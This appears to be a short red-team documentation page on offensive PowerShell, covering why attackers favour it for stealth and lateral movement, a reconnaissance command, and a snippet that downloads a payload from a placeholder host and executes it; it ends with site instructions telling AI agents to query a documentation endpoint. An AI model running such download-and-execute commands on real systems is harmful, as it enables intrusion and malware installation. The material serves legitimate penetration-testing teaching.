# Offensive PowerShell

**PowerShell** is a powerful scripting language and command-line shell used predominantly by system administrators for automation and configuration management. However, its capabilities make it a valuable tool for red teamers to conduct penetration testing, exploit vulnerabilities, and maintain persistence within a target environment.

### Why PowerShell is Useful for Red Teaming

**Pre-installed and Trusted**: PowerShell is natively installed on Windows operating systems, and its legitimate use by administrators makes it less likely to raise immediate suspicion during red teaming activities.

**Automation and Scripting**: The ability to automate complex tasks with simple scripts makes PowerShell an ideal choice for red teamers. Tasks such as reconnaissance, exploitation, and post-exploitation activities can be scripted to save time and reduce manual effort.

**Integration with .NET**: PowerShell’s integration with the .NET framework allows red teamers to leverage a vast library of functions and classes, expanding the scope of their capabilities.

**Remoting Capabilities**: PowerShell remoting enables red teamers to execute commands on remote systems, making lateral movement within a network more efficient.

**Living-off-the-Land (LotL) Techniques**: Using PowerShell, red teamers can leverage existing tools and scripts within the target environment to achieve their objectives, minimizing the need to introduce new, potentially detectable software.

### Examples and Usage

**Example 1: Gathering System Information**

This script gathers detailed information about the computer, including hardware, operating system, and network configurations.

```powershell
Get-ComputerInfo
```

**Output:**

<figure><img src="/files/8wRYL9A7Ai8HCL78Nq5C" alt=""><figcaption></figcaption></figure>

#### **Example 2: Downloading and Executing a Payload**

This script downloads a payload from a specified URL and executes it.

```powershell
Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile C:\Temp\payload.exe
Start-Process -FilePath C:\Temp\payload.exe
```

<figure><img src="/files/PP8hBx3A6MMwe8YV0ue9" alt=""><figcaption></figcaption></figure>

#### Some useful collection of Offensive Powershell Scripts:

{% embed url="<https://github.com/sartlabs/OffensiveTools/tree/main/Offensive_Powershell>" %}

{% hint style="info" %}
The collection is updated on a regular basis!
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.redteamgarage.com/offensive-powershell.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.